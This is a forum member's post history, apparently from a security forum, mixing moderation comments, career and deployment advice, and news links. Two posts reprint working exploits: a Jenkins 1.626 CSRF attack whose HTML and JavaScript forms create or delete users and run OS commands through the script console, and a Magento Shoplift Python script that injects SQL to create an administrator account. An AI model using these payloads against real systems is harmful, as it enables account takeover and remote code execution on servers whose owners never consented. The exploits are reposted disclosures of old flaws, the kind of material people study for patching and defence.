hades

Active Members
  • Posts: 1494
  • Joined
  • Last visited
  • Days Won: 15

Everything posted by hades

  1. Something tells me @io.kent is going to stay banned.
  2. @wildchild I'll personally look into your situation tomorrow.
  3. Greetings.
     1. Magento, as an e-commerce solution, requires a lot of attention when it comes to server configuration. Many would say I'm a lousy hater, but I have always preferred platforms built directly around the clients' needs. Maybe to begin with, to test what the 'market' is like, you could try WordPress, and later migrate to Magento or something custom. Obviously, something custom would cost you extra money.
     2. How the data scraping will be done can be determined depending on the supplier. There are quite a lot of people around here who do this on freelancing sites. The workload varies from site to site and is affected by the information you need.
     3. The import into the current shop can be done directly in the DB. The project is not something 'small', but it is nothing extravagant either. It all comes down to what you have and what you want within a given timeframe.
  4. # Title: Jenkins 1.626 - Cross Site Request Forgery / Code Execution
     # Date: 27.08.15
     # Vendor: jenkins-ci.org
     # Affected versions: => 1.626 (current)
     # Software link: http://mirrors.jenkins-ci.org/war/latest/jenkins.war
     # Tested on: win64
     # Author: Smash_
     # Contact: smash [at] devilteam.pl

     Cross site request forgery vulnerability in Jenkins 1.626 allows remote attackers to hijack the authentication of users for most requests. Using CSRF it is able to change specific settings or even execute code on os as shown below.

     Examples:

     <html>
       <!-- Change user description -->
       <body>
         <form action="http://127.0.0.1/jenkins/user/user/submitDescription" method="POST">
           <input type="hidden" name="description" value="abc" />
           <input type="hidden" name="json" value="{&quot;description&quot;: &quot;abc&quot;}" />
           <input type="hidden" name="Submit" value="Submit" />
           <input type="submit" value="Go" />
         </form>
       </body>
     </html>

     <!-- // -->

     <html>
       <!-- Add user -->
       <body>
         <form action="http://127.0.0.1/jenkins/securityRealm/createAccountByAdmin" method="POST">
           <input type="hidden" name="username" value="csrf" />
           <input type="hidden" name="password1" value="pass" />
           <input type="hidden" name="password2" value="pass" />
           <input type="hidden" name="fullname" value="Legit Bob" />
           <input type="hidden" name="email" value="bob@mail.box" />
           <input type="hidden" name="json" value="{&quot;username&quot;: &quot;csrf&quot;, &quot;password1&quot;: &quot;pass&quot;, &quot;password2&quot;: &quot;pass&quot;, &quot;fullname&quot;: &quot;Legit Bob&quot;, &quot;email&quot;: &quot;bob@mail.box&quot;}" />
           <input type="hidden" name="Submit" value="Sign up" />
           <input type="submit" value="Go" />
         </form>
       </body>
     </html>

     <!-- // -->

     <html>
       <!-- Delete user -->
       <body>
         <form action="http://127.0.0.1/jenkins/user/csrf/doDelete" method="POST">
           <input type="hidden" name="json" value="{}" />
           <input type="hidden" name="Submit" value="Yes" />
           <input type="submit" value="Go" />
         </form>
       </body>
     </html>

     <!-- // -->

     <html>
       <!-- Code execution #1
            groovy: print "cmd /c dir".execute().text -->
       <body>
         <form action="http://127.0.0.1/jenkins/script" method="POST">
           <input type="hidden" name="script" value="print &quot;cmd /c dir&quot;.execute().text" />
           <input type="hidden" name="json" value="{&quot;script&quot;: &quot;print \&quot;cmd /c dir\&quot;.execute().text\n&quot;, &quot;&quot;: &quot;&quot;}" />
           <input type="hidden" name="Submit" value="Wykonaj" />
           <input type="submit" value="Go" />
         </form>
       </body>
     </html>

     <html>
       <!-- Code execution #2
            groovy: print "cmd /c dir".execute().text -->
       <body>
         <script>
           var xhr = new XMLHttpRequest();
           xhr.open("POST", "http://127.0.0.1/jenkins/computer/(master)/script", true);
           xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
           xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
           xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
           xhr.withCredentials = true;
           var body = "script=println+%22cmd+%2Fc+dir%22.execute%28%29.text&json=%7B%22script%22%3A+%22println+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj";
           var aBody = new Uint8Array(body.length);
           for (var i = 0; i < aBody.length; i++)
             aBody[i] = body.charCodeAt(i);
           xhr.send(new Blob([aBody]));
         </script>
       </body>
     </html>

     Request:

     POST /jenkins/script HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: pl,en-US;q=0.7,en;q=0.3
     Accept-Encoding: gzip, deflate
     Referer: http://127.0.0.1/jenkins/script
     Cookie: JSESSIONID=E8F948238B2F4D6DAFAF191F074E6C3E; screenResolution=1600x900
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 178

     script=print+%22cmd+%2Fc+dir%22.execute%28%29.text%0D%0A&json=%7B%22script%22%3A+%22print+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%5Cn%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj

     Response:

     HTTP/1.1 200 OK
     Date: Thu, 27 Aug 2015 18:06:55 GMT
     Server: Apache
     X-Frame-Options: SAMEORIGIN
     X-Content-Type-Options: nosniff
     Expires: 0
     Cache-Control: no-cache,no-store,must-revalidate
     X-Hudson-Theme: default
     X-Hudson: 1.395
     X-Jenkins: 1.626
     X-Jenkins-Session: 0ff3a92b
     X-Hudson-CLI-Port: 1834
     X-Jenkins-CLI-Port: 1834
     X-Jenkins-CLI2-Port: 1834
     X-Frame-Options: sameorigin
     X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoMa5pk8H/b/c/jIOBH+D8XGi2/1MUshSuGtK41S9ON67SRR1Dzmqlzhj+Hsgla6+NJDCFKqZf3aoQbgt8nVzQRkb12bjYPHMupa58SApxwIyvhRJaNq9jq+CcllEwt9m+N1JeCxeLork82LAbiDSBbPhHBGLzqA0a9hzKVTm80i9yiTqDoEK+WyK4m8AyqJFH/V4lkERKbSr2YK1u2sFGCuBaGAK/RYspmNmJSqj0c3lPEYeDsehTSn4PHpFrbsvKkHKD1RxNDRciSFMNY3RtxpBEhKxvJHkpy9HKF+ktYebwCMZ4J8LKnhkvwqJPgpqar3FuxX4Gsfwoy0/1oCtPQIDAQAB
     X-SSH-Endpoint: 127.0.0.1:1832
     Content-Type: text/html;charset=UTF-8
     Content-Length: 13468
     Keep-Alive: timeout=5, max=100
     Connection: Keep-Alive

     (...)
     ><link rel='stylesheet' href='/jenkins/adjuncts/0ff3a92b/org/kohsuke/stapler/codemirror/theme/default.css' type='text/css' /><h2>Rezultat</h2><pre>
      Wolumin w stacji C to Windows7_OS
      Numer seryjny woluminu: D2DC-59F9

      Katalog: C:\Bitnami\jenkins-1.626-0

     2015-08-27  18:51    <DIR>          .
     2015-08-27  18:51    <DIR>          ..
     2015-08-27  18:47    <DIR>          apache-tomcat
     2015-08-27  18:47    <DIR>          apache2
     2015-08-27  18:47    <DIR>          apps
     2015-08-27  18:49             9 751 changelog.txt
     2015-08-27  18:47    <DIR>          common
     2015-08-27  18:48    <DIR>          git
     2015-08-27  18:49    <DIR>          gradle
     2015-08-27  18:47    <DIR>          img
     2015-08-27  18:47    <DIR>          java
     2015-08-27  18:47    <DIR>          licenses
     2015-07-30  14:15         3 080 056 manager-windows.exe
     2015-08-27  18:50             1 102 properties.ini
     2015-08-27  18:49            12 118 README.txt
     2015-08-27  18:50    <DIR>          scripts
     2015-08-27  18:47             5 536 serviceinstall.bat
     2015-08-27  18:47             5 724 servicerun.bat
     2015-08-27  18:47    <DIR>          sqlite
     2015-08-27  18:51           268 031 uninstall.dat
     2015-08-27  18:51         7 038 369 uninstall.exe
     2015-08-27  18:50               166 use_jenkins.bat
                    9 plik(ów)     10 420 853 bajtów
                   13 katalog(ów)  110 690 426 880 bajtów wolnych
     </pre></div>
     (...)

     Source
  5. You don't work on Fridays, you read, moron.
  6. I think his address is: dogecoin: dKb8zoXmeA3Pk2eBchEtTxGkJndMMxRRNJ A smiley was automatically inserted at ":" + "d"
  7. Did you read the comment on SourceForge? If so, what is this junk doing here?
  8. ##################################################################################################
     #Exploit Title : Magento Shoplift exploit (SUPEE-5344)
     #Author        : Manish Kishan Tanwar AKA error1046
     #Date          : 25/08/2015
     #Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
     #Debugged At   : Indishell Lab(originally developed by joren)
     ##################################################################################################

     ////////////////////////
     /// Overview:
     ////////////////////////

     Magento shoplift bug originally discovered by CheckPoint team (http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/)
     This python script developed by joren but it was having some bug because of which it was not working properly.
     If magento version is vulnerable, this script will create admin account with username forme and password forme

     ////////////////
     /// POC ////
     ///////////////

     Exploit script starts here
     ///////////////////

     #Thanks to
     # Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON
     import requests
     import base64
     import sys

     target = "http://target.com/"

     if not target.startswith("http"):
         target = "http://" + target

     if target.endswith("/"):
         target = target[:-1]

     target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

     q="""
     SET @extra,NULL, NOW());
     INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
     """

     query = q.replace("\n", "").format(username="forme", password="forme")
     pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

     # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is {{block type=Adminhtml/report_search_grid output=getCsvFile}}
     r = requests.post(target_url,
                       data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                             "filter": base64.b64encode(pfilter),
                             "forwarded": 1})
     if r.ok:
         print "WORKED"
         print "Check {0}/admin with creds forme:forme".format(target)
     else:
         print "DID NOT WORK"

     /////////////////
     exploit code ends here

     Source
  9. What's XSS? Answer that question for yourself and you'll figure out on your own what you need to learn.
  10. Supposedly the Germans gave the Americans intercepted logs from their own citizens in exchange for a copy of XKeyscore. XKeyscore is a surveillance program that gets installed on the network, designed by the NSA to know what cat pictures people are looking at. Via
  11. There will be questions about algorithms and optimizations. They will almost certainly ask you about some sorting methods for lists; for OOP they are interested in constructors/inheritance (strong inheritance, etc.). Method overriding, multiple inheritance (I don't even know if it's practiced in languages other than Python, lol), and... algorithms. There were some Lynda.com courses about OOP on filelist. Very good.
  12. In case you write Python (or PHP, Node.js, etc.) and want a 'test' environment where you can deploy your application, you can confidently use Heroku (Cloud Application Platform).

      I use Heroku to deploy Django applications, and what I like is that I don't have to bother with a lot of configuration for a test environment (configurations like this one).

      So here is a mini introductory tutorial on deploying an application to Heroku:

      1. Install the Heroku Toolbelt

         (venv)~/p/s/project git:develop $ wget -O- https://toolbelt.heroku.com/install-ubuntu.sh | sh

      2. Log in with your Heroku credentials

         (venv)~/p/s/project git:develop $ heroku login

         You will be asked for your username/password.

      3. Assuming you are in the application's directory: create a Procfile that will run the WSGI server for the app (WSGI because I'm talking about Python here). Something like:

         web: gunicorn projectdjango.wsgi --log-file -

         Make sure to put gunicorn in requirements.txt in this case. At deploy time, the Heroku dyno will look in requirements.txt and automatically install all the dependencies.

      4. Create a remote repo on Heroku

         Initialize the repo (in case you don't already have one that you use on Bitbucket/GitHub):

         git init

         Create a remote repository to which you will push the code:

         heroku create

      5. The actual deploy:

         git push heroku master

      Broadly, what happens is that a repo is associated with your server on Heroku; when you push to the remote repo, the Heroku dyno knows to do pull + install requirements + restart gunicorn.

      If anything is unclear, I'll try to answer.
  13. Hi. Thanks for the introduction. You didn't specify anything concrete about your knowledge. For a pleasant experience on the forum, I'd ask you not to reopen 2-year-old threads anymore. Thanks and enjoy your stay.
  14. 220,000 iCloud accounts compromised after users tried to jailbreak their devices with some shady methods. So be careful who you take your phone to for jailbreaking or which tutorials you follow. Via
  15. If you have something to settle, I recommend you do it in a civilized manner; when you say that X scammed you, also prepare evidence to support your theory. Otherwise, the off-topic kind of spreads around here. TC.
  16. He's probably a scammer. In the future, try not to 'help' anonymous people on the internet anymore.
  17. @q111: Take it easy, Reckon.
  18. If you DDoS someone who hasn't harmed anyone and promotes open source, it means you're an ordinary brat. Still, your question seems a bit downy.
  19. Several ISPs in Austria were served notice by IFPI Austria (some association connected to the music industry over there) to block their customers' access to The Pirate Bay. T-Mobile had the decency to refuse. Via.
  20. Closed. We don't rip each other off with crap.
  21. The post count required to post in the market isn't there just to make the forum look more badass. Its purpose is to encourage 'business' between and with the active/serious members of the forum. The fact that you are posting on his behalf without taking responsibility for things going well doesn't change anything.
  22. @DeMoN23: And I wonder why your colleague can no longer post at RST Market?
  23. Raymond Hettinger is a Python Core Developer. So he knows what he's talking about; he also knows how to talk. Just right to watch over a coffee. Super considered super: Python objects:
  24. GitHub got DDoSed from China, supposedly. More proof that DDoS is the weapon of all the uneducated. From here.